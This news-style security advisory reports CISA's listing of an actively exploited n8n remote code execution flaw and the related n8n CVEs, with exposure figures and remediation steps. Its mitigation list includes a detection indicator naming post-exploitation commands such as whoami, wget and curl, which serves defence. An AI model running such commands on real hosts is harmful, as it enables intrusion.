The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a critical remote code execution (RCE) flaw in the n8n AI workflow automation platform to its Known Exploited Vulnerabilities (KEV) catalog on March 11, 2026, following confirmed active exploitation in the wild. The action compels Federal Civilian Executive Branch (FCEB) agencies to remediate affected instances by March 25, 2026, under Binding Operational Directive BOD 22-01 and signals a broadening threat model for enterprise AI automation tooling that security teams across all sectors must address.
Background
n8n is an open-source, Node.js-based workflow automation platform widely deployed across enterprise IT environments to connect SaaS applications, APIs, cloud services, and internal systems. The platform serves roughly 230,000 active users and supports over 400 third-party integrations, making it a high-value target for adversaries seeking a centralized point of compromise within modern IT supply chains.
The initial vulnerability, tracked as CVE-2025-68613 and rated 9.9 on the CVSS scale, was disclosed by n8n developers on December 19, 2025. The flaw resides in n8n's server-side expression evaluation engine, where improperly controlled code resources allow authenticated users with workflow creation or editing permissions to inject malicious expressions that escape sandbox boundaries and execute arbitrary code with the privileges of the underlying n8n process. According to Resecurity, exploitation collapses all trust boundaries within the platform, enabling attackers to "operate with the same authority as the automation platform itself."
Active exploitation of CVE-2025-68613 was first publicly reported in mid-January 2026, when Akamai's security intelligence and response team observed the Zerobot botnet-a Mirai-based threat known for targeting IoT devices-leveraging the vulnerability to compromise internet-facing n8n instances.
Details
The scope of exposure has remained persistently large. Censys reported 103,476 potentially vulnerable n8n instances as of December 22, 2025, with the majority located in the United States, Germany, France, Brazil, and Singapore. As of early February 2026, Shadowserver Foundation data indicated over 24,700 unpatched instances remained publicly exposed, and Intel 471 observed 71,537 exposed instances worldwide as of March 16, 2026.
The CVE-2025-68613 disclosure triggered a cascade of related vulnerability reports. Researchers at Pillar Security identified two additional maximum-severity flaws (CVSS 10.0), documented under GitHub advisory GHSA-6cqr-8cfr-67f8, one of which bypassed the initial patch within 24 hours of its deployment. n8n addressed both in version 2.4.0, released in January 2026. A separate vulnerability, CVE-2026-21858 (CVSS 10.0), also disclosed in early 2026, allows unauthenticated attackers to achieve RCE through improper webhook handling, according to The Register. CVE-2025-68668, rated 9.9, was disclosed by Cyera Research Labs in January 2026 and exploits n8n's Pyodide-backed Python execution environment to escape the sandbox via blocklist bypass.
Eilon Cohen, an AI security researcher at Pillar Security, stated that the vulnerabilities expose "OpenAI keys, Anthropic credentials, AWS accounts and the ability to intercept or modify AI interactions in real-time-all while the workflows continue functioning normally."
The threat surface extends beyond direct CVE exploitation. Cisco Talos research identified a 686% increase in malicious emails embedding n8n webhook URLs between January 2025 and March 2026, with threat actors abusing the platform's legitimate infrastructure to bypass email security filters, deliver remote access tools, and fingerprint target devices. Observed phishing campaigns employed CAPTCHA-protected landing pages to deliver modified versions of Datto RMM and ITarian Endpoint Management software.
CVE Summary Table
| CVE ID | CVSS | Type | Disclosed | Fixed In | Status |
|---|---|---|---|---|---|
| CVE-2025-68613 | 9.9 | Expression Injection / RCE | Dec 2025 | v1.120.4-v1.122.0 | KEV Listed |
| CVE-2025-68668 | 9.9 | Pyodide Sandbox Escape / RCE | Jan 2026 | v2.0.0 | Active |
| CVE-2026-21858 | 10.0 | Unauthenticated RCE (Webhook) | Jan 2026 | v2.4.0 | Active |
| CVE-2026-27577 | 9.4 | Expression Evaluation Bypass | Feb 2026 | v2.4.0 | Patched |
Incident Response and Mitigation Steps
Security teams operating n8n deployments should prioritize the following actions, based on guidance from CISA, Pillar Security, Resecurity, and Intel 471:
- Upgrade immediately to n8n version 2.4.0 or later. Environments that applied partial mitigations to CVE-2025-68613 remain exposed and must still upgrade.
- Rotate all stored credentials. Treat all API keys, OAuth tokens, cloud provider credentials, and database passwords accessible via n8n workflows as potentially compromised.
- Restrict workflow permissions to a minimal, verified set of users. Audit all existing role assignments and remove standing access not tied to active operational requirements.
- Harden deployment environments by isolating n8n instances from public internet exposure, applying OS-level least-privilege configurations, and placing instances behind a VPN or reverse proxy.
- Implement behavioral monitoring for indicators such as anomalous child process execution (
id,whoami,wget,curl), unauthorized workflow modifications, and unexpected outbound connections from the n8n host. - Share indicators of compromise-including webhook URL structures, malicious file hashes, and C2 domains-with threat intelligence communities such as Cisco Talos Intelligence and Shadowserver.
Outlook
As of Q1 2026, 121 CVEs with AI relevance had been identified, a figure consistent with rising AI component adoption across the software stack, according to BackBox. The n8n incident is expected to accelerate enterprise scrutiny of third-party automation platforms as critical supply chain components. Organizations scaling AI-driven workflow infrastructure should treat automation platforms as high-risk attack surfaces and integrate them into formal vulnerability management, change control, and incident response programs.
